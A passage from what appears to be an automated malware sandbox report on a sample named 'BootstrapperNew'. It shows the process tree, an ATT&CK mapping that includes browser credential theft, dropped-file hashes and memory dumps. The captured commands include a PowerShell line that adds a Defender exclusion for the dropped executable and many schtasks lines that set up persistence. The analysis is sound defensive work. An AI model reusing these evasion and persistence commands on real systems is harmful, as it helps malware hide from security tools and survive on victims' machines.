        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Browsercommon\providerFontHostperfCrt.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1152
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\GLSiq5NqrO.bat"
        5⤵
        
        PID:3036
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
        
        PID:2480
      - C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        6⤵
        
        PID:936
      - C:\Recovery\18fc4542-69f6-11ef-a46c-62cb582c238c\dwm.exe
        
        "C:\Recovery\18fc4542-69f6-11ef-a46c-62cb582c238c\dwm.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2720

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2488

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\Admin\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1512

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:396

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 8 /tr "'C:\Users\Default\My Documents\OSPPSVC.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1872

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OSPPSVC" /sc ONLOGON /tr "'C:\Users\Default\My Documents\OSPPSVC.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2020

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 10 /tr "'C:\Users\Default\My Documents\OSPPSVC.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2960

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 14 /tr "'C:\Recovery\18fc4542-69f6-11ef-a46c-62cb582c238c\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2604

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\18fc4542-69f6-11ef-a46c-62cb582c238c\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:844

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 8 /tr "'C:\Recovery\18fc4542-69f6-11ef-a46c-62cb582c238c\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1764

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Journal\fr-FR\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1788

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files\Windows Journal\fr-FR\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1568

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Journal\fr-FR\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1048

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 13 /tr "'C:\Recovery\18fc4542-69f6-11ef-a46c-62cb582c238c\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2972

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\18fc4542-69f6-11ef-a46c-62cb582c238c\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2008

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 8 /tr "'C:\Recovery\18fc4542-69f6-11ef-a46c-62cb582c238c\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2060

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "providerFontHostperfCrtp" /sc MINUTE /mo 12 /tr "'C:\Browsercommon\providerFontHostperfCrt.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2880

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "providerFontHostperfCrt" /sc ONLOGON /tr "'C:\Browsercommon\providerFontHostperfCrt.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2196

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "providerFontHostperfCrtp" /sc MINUTE /mo 13 /tr "'C:\Browsercommon\providerFontHostperfCrt.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1828

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Browsercommon\IOhgPL0nkibUOseR8JwyIvVZWJDmloCdkfQ.vbe

Filesize
195B

MD5
7bb6676efb12a625a6875579da55495b

SHA1
8320aa0275bff95fe26c36e27567894ca9df20c4

SHA256
a85701421c08b83b63110e3b1147977a990e67f65c86dd05550407a19521a897

SHA512
7d5e05e2cdec14a945b567e5dca472d80980bec3b2da5d89285149176c24183faec41936abceebdeae3a086194afdd84349f54d325becd4556ef1d6f374ee370

Download Submit
C:\Browsercommon\inE.bat

Filesize
216B

MD5
02e00b747d143f33ea8a2e5cc4f3d750

SHA1
f9749c87e2a87e2ea8650262b3816a1af4eaed4c

SHA256
fea81fac5cda164ee511df6c067d71aea46baec472f85e28832de53877a799ae

SHA512
4bb6c99e45cc9137274db3ffbee974edc4a932c03756d28f751e693cec567e9e877f2068f219b23b5003e99b32fcf113d90ed3f0559c418b8666dfdd58732fe3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\070E0202839D9D67350CD2613E78E416

Filesize
1KB

MD5
55540a230bdab55187a841cfe1aa1545

SHA1
363e4734f757bdeb89868efe94907774a327695e

SHA256
d73494e3446b02167573b3cde3ae1c8584ac26e15e45ac3ec0326708425d90fb

SHA512
c899cb1d31d3214fd9dc8626a55e40580d3b2224bf34310c2abd85d0f63e2dedaeae57832f048c2f500cb2cbf83683fcb14139af3f0b5251606076cdb4689c54

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DABA17F5E36CBE65640DD2FE24F104E7

Filesize
1KB

MD5
c6150925cfea5941ddc7ff2a0a506692

SHA1
9e99a48a9960b14926bb7f3b02e22da2b0ab7280

SHA256
28689b30e4c306aab53b027b29e36ad6dd1dcf4b953994482ca84bdc1ecac996

SHA512
b3bd41385d72148e03f453e76a45fcd2111a22eff3c7f1e78e41f6744735444e058144ed68af88654ee62b0f117949f35739daad6ad765b8cde1cff92ed2d00c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\070E0202839D9D67350CD2613E78E416

Filesize
230B

MD5
6826afeebf6af0a02181a4052f8e2c5c

SHA1
5d0478aa723d6dab93dffc616e4aa406ee5d103e

SHA256
9453851f10bdfedb6d7b077c68b2a30fa116e9368672f671235a289433a25393

SHA512
993fee82d5b0070d41ff5dd1dc60bacd184f2fd3b46e7bf4d84c5d1e93cd72139ab574efdecfbaf181ef0e13a12e50d31198a1949190c4c57600e9425c795dac

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
47a6739dda32f54151179f249d89fee0

SHA1
b5515d0fcf72fb39eda6c8a0af83108949aff9d1

SHA256
986db81d5f95b8c0ccc113c02e918282320d9925455f8c031f03ec1684ab7c38

SHA512
8ccd25338730366e33248dc585439e4a3fb93f76ddfcf9ee43813fb480a1e195ee611f475fb87270b3030417ebd64d9c0285b4f4e9219c7171bd181ed997490e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
ba9af7726f7c716153e317371b14b10c

SHA1
5e3a01b57d3829ae253ba921c3deb11674d32055

SHA256
48c463a200db6b311b6b20222e7b36ab6ff9387d43ee8fb052ff0d4e24951e76

SHA512
a4d1272b33b0929ffa12e54a2cf63e2c1b7ee64a1d70a1c5be2f8944ec69d1e1d5831b9703985a334fec3a87b580e1fecf3ef26f8ecc3c3768934c9b04cdb9c1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
0a1e0d6ff3cfc357126a33f8a25fdff5

SHA1
f9974f9952c756ac0fcb48f29a5cf1f5269a31d5

SHA256
bb06e79321fdbcd88e8572d598fe4ed8be8ae885b2d0de5a3f283a73d3963eae

SHA512
039167f08b5f8fed5fa4907526f676f0b33d8632ab8367260256bfd4932e235f6a8ca27ef19abef65c0b9416ffd853624a06763a93b2a006e7e9aa9da4fd9443

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
aaacab5a4125bd7564a5f9bdb000c454

SHA1
97db37d8ebd5e4134a4614006e50f72eeead7cb6

SHA256
38ba1c563ff5efd7ad98eba4423b97eab220cc1fcc0fac9f25d6ed4c4746cd87

SHA512
9ccfd801bbe3896743b9125a036f26ff2e19d8fdf83c4bf355c3f89868293a85128259d2b19fc63c82a1a9ea565fdce7e20ae3a5dd1033d9878cabe08671c388

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
23aa87a7e1fe5ae1b84beb40f7692e7c

SHA1
e1dee08e2f0e562949463eacff531d405686c39d

SHA256
ad58891ace5cc46d2a90e50a2f5e93e19ea3c8e09c872a7b9a5a2cfacd365c94

SHA512
60c4eddaf1fec47c36a6129f21a9f31f5a63133f71b3e9bdce11f7ca7c34c14d3dc388a91a9da8db74c1f718df8b74a7bbb5ae440259f6d955b85c447927f680

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
912390b30d144107f3fab914229e5380

SHA1
b1c96e165ce9050593315556ca1f699f1a74c587

SHA256
54e625eed6a236c62b15ffa528e531f9e72dce38c6d33459c32dc6a5698e7048

SHA512
51d6c977059d39b51a01a6660263b0112753038c7669f4541480d817a55fd73def4053295b34e67d50d225c0f8722317896c448924178ebb57bb8ec5dc1405bf

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
3ccb9a19769267c351e2800ac3401fa3

SHA1
cf7325ed27fe7522fd01aff534052dfde8cd1f03

SHA256
aec921a68fb4ab42bfcf233961293982dc80c2b00c0b068ad09d42eb1e06dda2

SHA512
fc80ad0a5ed1d7989680090e26397fc18eefe6238806718dd2c39c63c4674d8f426556abc9e50cc7817097f538f2739cd1d9be8af90af48d77d5d3c9c572a1ec

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
aa80770f17a7b4c6aa82f4342e6da6d0

SHA1
6b28acd1983717862987f15230b6d39cf2edb37f

SHA256
05663329b273085fcf5a97c42a8dd1d654c113cb3e3e8c9dd04a4317cd679958

SHA512
75601484449a661572cdfcb8e7ad927a577b06e5d8062884b7af7e4010b6f9c7d3922c1c8c0486ed5048378a5d9f87b81cb16989ea7260fcf00a0f189ba20d3a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
3c31e1815b845f0390a82e27dfb270f1

SHA1
42ea850370245aaa678cbf6785a1b2b4482d8686

SHA256
30f75544668daba9ded1b26476e6950d98bf363a532ab0b207fd942f8073c930

SHA512
5e1324165e31b192b55acc36ab69e615f9c863eb8b8515d0ef52053dc10152db2a9fb702ab43175ec4e36ddc5cf3bc95bacce7569f2b661502067c0847eecc7f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
2996ca29a751b24b366a94b63058949c

SHA1
221013a1bd0e6bcf19ee19f53104a54cbde947dd

SHA256
e0623ccb839256f4cec5a1c60e11e0a79a0463cf2e13d826009bf27fcd57cfd3

SHA512
2cc5208662bc7864059768ee5008a652afdb99c5d3432c38f0839212423f926d776b4c709288b660692e13ac3a214477aa9cc3a6651b5547d85ada2e866722ef

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
3bdf2d31c30388aa81eaf9d56822a5f1

SHA1
d143a9839914e63cfc1ded31f4b10c239f0a2888

SHA256
4c7be71645aa4e688db9409635f1317dcafb75860ed8c5e4abf6059c0eb5462c

SHA512
b00928f366b94bb932ab8d70ccea27467a4535ca390a37aa4f9f4a3b0bdda22158093d9f2921ed0c747e3675eef8c74f4613bb22e28be9db437de2bbdbf882e4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DABA17F5E36CBE65640DD2FE24F104E7

Filesize
276B

MD5
7c85d746f140bdc2f0f68b88e8c5d770

SHA1
9f63f1010508f92d575b280375856f2a95996fbd

SHA256
29578c21be6a89b9709268292a6099d077a775f42916e54ac305f7eaa1cec5aa

SHA512
7ade74f6e27870619fa844b29b63cc986a728f0e55c7220d147f1390cbc65df592d2a76b4592ade27bd0f0f88c752d193fd14ee55a37921db64dff245884662f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\5443965a-733b-4edf-a5e7-5749aa181491.tmp

Filesize
168KB

MD5
7f4d7abba4d5565b99e4a7569386a23e

SHA1
35d11b5266b89aa754948f3839b20a4f9a31ed85

SHA256
fc0402a512097ed4c3e4d0453f9103e2c94fa3af7d23ded57d6956be51ea851c

SHA512
3817d5c5fd0dcc612f0161c9a8f9d58b69aaf9a4b47b53074b992d81622ccf337837ea61bb52175b11283d2b17eb4c1ab3cf7ae98af01ee2e50bdeca3633e295

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
1d6994c9e7456e30a9c2dcecdc184047

SHA1
ad85ecf6f00da14dbde2b4b22e52809a02ad11cb

SHA256
32d641a0b1a4d012ac26b4511e84b1ce3a0c129fccd4e85a78a31d46b14f1a8d

SHA512
45820fc375361f0518efc53e283a5421a58ace75b2d4d94c9a190ac75a3b3717b9b797e8d27cec3014fcc9e9ea27f2ffc586777d8d658e0e24d379fe7604c607

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000006.dbtmp

Filesize
16B

MD5
aefd77f47fb84fae5ea194496b44c67a

SHA1
dcfbb6a5b8d05662c4858664f81693bb7f803b82

SHA256
4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611

SHA512
b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

Filesize
28KB

MD5
4aa584eff9ee5551e31853b81e3beb2e

SHA1
594c9a134e82a4ed2a986907a3c684425cfad167

SHA256
d238bf0bc0d77d8a799b204e8b76779a7cdc07c68a6f7d936142032e68be6284

SHA512
1a07d415d6f48c92e45c1d7ce5d8f2fdd6b8d50e4aca669de7c1b195061ca2723c1a1e7ed8be888819ebe192eb7b04afbd6317f7686ca0da17b53f74ca39b6fa

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
7f0f2dc584184ddd60254600cd34d0ff

SHA1
38cbaacb471def3df1d1c2238f176a7f5de519d1

SHA256
bddb19dbe581f8511df308c6b690330f4935a2169bc125302261f4ccb2c069b6

SHA512
f7f7be305d5a904b1419ab7eef2ed5f570516fbe4db391886f58aaa5b6386b3d29f622bd395010f52ce87ad68c4a27b551c3560b6ad71046e599b086c7fb6e9b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
005f2403d37acb40f1903682b22a69d9

SHA1
2baa62d4381f65b19f79ac2a16cc7823068693cd

SHA256
9a6bb365d384d89793a3f4f0ca2052e35f82edc99395e2270f5f15dd97d01360

SHA512
0880525a35f5881d948fbf7f1e272df1127b1e7acfb984e94dc68e172f00ad015bfec8d30818b91a71673f876dfa7d46e8a2e1b41eb07383ae2ea263a2cb7c73

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp

Filesize
16B

MD5
18e723571b00fb1694a3bad6c78e4054

SHA1
afcc0ef32d46fe59e0483f9a3c891d3034d12f32

SHA256
8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa

SHA512
43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\e26ff18d-a56d-44b7-9ec0-5cd1c1eba651.tmp

Filesize
168KB

MD5
9d194be8d7c77be88fe79aad60b79871

SHA1
70839dbaa5c6e5d0f346cd69199d8f1cbcd33cb8

SHA256
9a3b46531f42b098c3f61e0dddbded844d6e2ef65897df2367b0d8d0a503f798

SHA512
0489f948e07bd0ef48526dae7092771c1e5f82740052598f4f65310bc1a7ab80056c83211d995d26ca103b53cd222f81047b0540ed43d062c7c00c3668971ac4

Download Submit
C:\Users\Admin\AppData\Local\Temp\9fon6HGqTg

Filesize
92KB

MD5
0040f587d31c3c0be57da029997f9978

SHA1
d4729f8ed094797bd54ea8a9987aaa7058e7eaa2

SHA256
a285e3bc24d218869afd114c236f0aafebeba96d4105ddd379ae31f03b26079b

SHA512
3e4ffca2ff979b5f91a0c8d5d1fa52f0ab47ff63e50b1cc5e7708c4ba8359ee8505a9259f329da5733048e953f0778af73ce76735b481d558dd05a2cb45a5977

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab6902.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\GLSiq5NqrO.bat

Filesize
232B

MD5
c5ece5b1bb708bdf3eca1642206d628e

SHA1
c786670a95b69cdbc17fd1c77d6e686118656abf

SHA256
55130dac9b2ae35ceee398df4b474b12a678f6eeb8448cd60b5605c09fd2a2b9

SHA512
2142076a420c6370018a0eb5b0c3557ff250efa38dd5b7e62ff22e10c628236bf61d26adf1e72f7496c8272e05371018b036226f4ce4bf1b135a6d4fb3b8c245

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar6914.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\nzAcnbvpUF

Filesize
46KB

MD5
02d2c46697e3714e49f46b680b9a6b83

SHA1
84f98b56d49f01e9b6b76a4e21accf64fd319140

SHA256
522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

SHA512
60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
c6e8ee26f7097491a5edd58518731ade

SHA1
3e7c7f52548b6418ca53f5260341e9c765327219

SHA256
7f6ffb0421134314d76df2a22b4fd11b19499c1db9699b742e683abd5fe94433

SHA512
583965e46f665d7979662c37eb45cd51f1636cb716e76353fa454f03c18c7d273c071bcb212cec98eaf7d27bae583193719c2ad7eccdc7c60ea06e2bae03c525

Download Submit
C:\Users\Admin\Downloads\BootstrapperNew.zip

Filesize
3.3MB

MD5
dd5e9614239c69c704ea2838d63bb743

SHA1
2a8e636928c86af5adcde714491c24e87fe0368c

SHA256
98cf9b7ae54dbc4cfa596dfe977c2742579cc5a7a4cf0a631a7bd4874d4ad9d5

SHA512
2cad91209d65bd58903239547912f29fa8165800dc321f5ebb24995fe72ac500a6a49ccb5bde7c124e31e3ac9be084b3ad8855d61141df9549bd15d1b7ec95f5

Download Submit
C:\Users\Admin\Downloads\BootstrapperNew\BootstrapperNew.exe

Filesize
3.4MB

MD5
3464a5b313c658db47daabe25a3bbe1d

SHA1
ca50766a78399a5ec8a7fa5fcd627c5802a6c1c3

SHA256
fba233351d72e0eec9250babd033c7e82caaf8b6a1448d34e20cbce027575482

SHA512
05116d49a9ac3dd9fa959510150f7b853ab5c0469ddd11d3c9487d13cf5ea4635e4dba8c4622dcb41c4498b30d58bc73ec51ce6deab530e7159107c335af7b83

Download Submit
\Browsercommon\providerFontHostperfCrt.exe

Filesize
6.4MB

MD5
1b0d778848c272d9371b8416993ac51f

SHA1
b314539920bcc9e92512ba3f660bc8cebb4d133d

SHA256
33097f4a8833f96fa33cbca96df83d751dac7406152cfcd41a20b95d2035f120

SHA512
a59c4edec00bf8d1eaa5c0dc70f6d30c2f3cca0f81017fa5318feaac85a554a7ff0c25c097ad3c3932bd7dc8995594e164814368f953815db93780be9155bdbd

Download Submit
memory/320-1074-0x0000000000840000-0x000000000084E000-memory.dmp

Filesize
56KB

Download
memory/320-1054-0x00000000005A0000-0x00000000005B0000-memory.dmp

Filesize
64KB

Download
memory/320-1076-0x0000000000990000-0x00000000009A0000-memory.dmp

Filesize
64KB

Download
memory/320-1078-0x00000000009A0000-0x00000000009AE000-memory.dmp

Filesize
56KB

Download
memory/320-1058-0x0000000000600000-0x0000000000612000-memory.dmp

Filesize
72KB

Download
memory/320-1060-0x00000000005E0000-0x00000000005F0000-memory.dmp

Filesize
64KB

Download
memory/320-1062-0x0000000000850000-0x0000000000866000-memory.dmp

Filesize
88KB

Download
memory/320-1064-0x0000000000870000-0x0000000000882000-memory.dmp

Filesize
72KB

Download
memory/320-1066-0x00000000005F0000-0x00000000005FE000-memory.dmp

Filesize
56KB

Download
memory/320-1068-0x0000000000620000-0x0000000000630000-memory.dmp

Filesize
64KB

Download
memory/320-1070-0x0000000000830000-0x0000000000840000-memory.dmp

Filesize
64KB

Download
memory/320-1072-0x000000001AA40000-0x000000001AA9A000-memory.dmp

Filesize
360KB

Download
memory/320-1040-0x00000000001F0000-0x000000000057E000-memory.dmp

Filesize
3.6MB

Download
memory/320-1050-0x00000000005C0000-0x00000000005D8000-memory.dmp

Filesize
96KB

Download
memory/320-1056-0x00000000005B0000-0x00000000005BE000-memory.dmp

Filesize
56KB

Download
memory/320-1082-0x00000000009B0000-0x00000000009BC000-memory.dmp

Filesize
48KB

Download
memory/320-1084-0x000000001AB30000-0x000000001AB7E000-memory.dmp

Filesize
312KB

Download
memory/320-1080-0x0000000002390000-0x00000000023A8000-memory.dmp

Filesize
96KB

Download
memory/320-1052-0x00000000001B0000-0x00000000001C0000-memory.dmp

Filesize
64KB

Download
memory/320-1042-0x00000000001C0000-0x00000000001E6000-memory.dmp

Filesize
152KB

Download
memory/320-1048-0x00000000001A0000-0x00000000001B0000-memory.dmp

Filesize
64KB

Download
memory/320-1044-0x0000000000190000-0x000000000019E000-memory.dmp

Filesize
56KB

Download
memory/320-1046-0x0000000000580000-0x000000000059C000-memory.dmp

Filesize
112KB

Download
memory/2192-1105-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

Filesize
2.9MB

Download
memory/2192-1106-0x0000000002240000-0x0000000002248000-memory.dmp

Filesize
32KB

Download
memory/2720-1200-0x00000000003E0000-0x000000000076E000-memory.dmp

Filesize
3.6MB

Download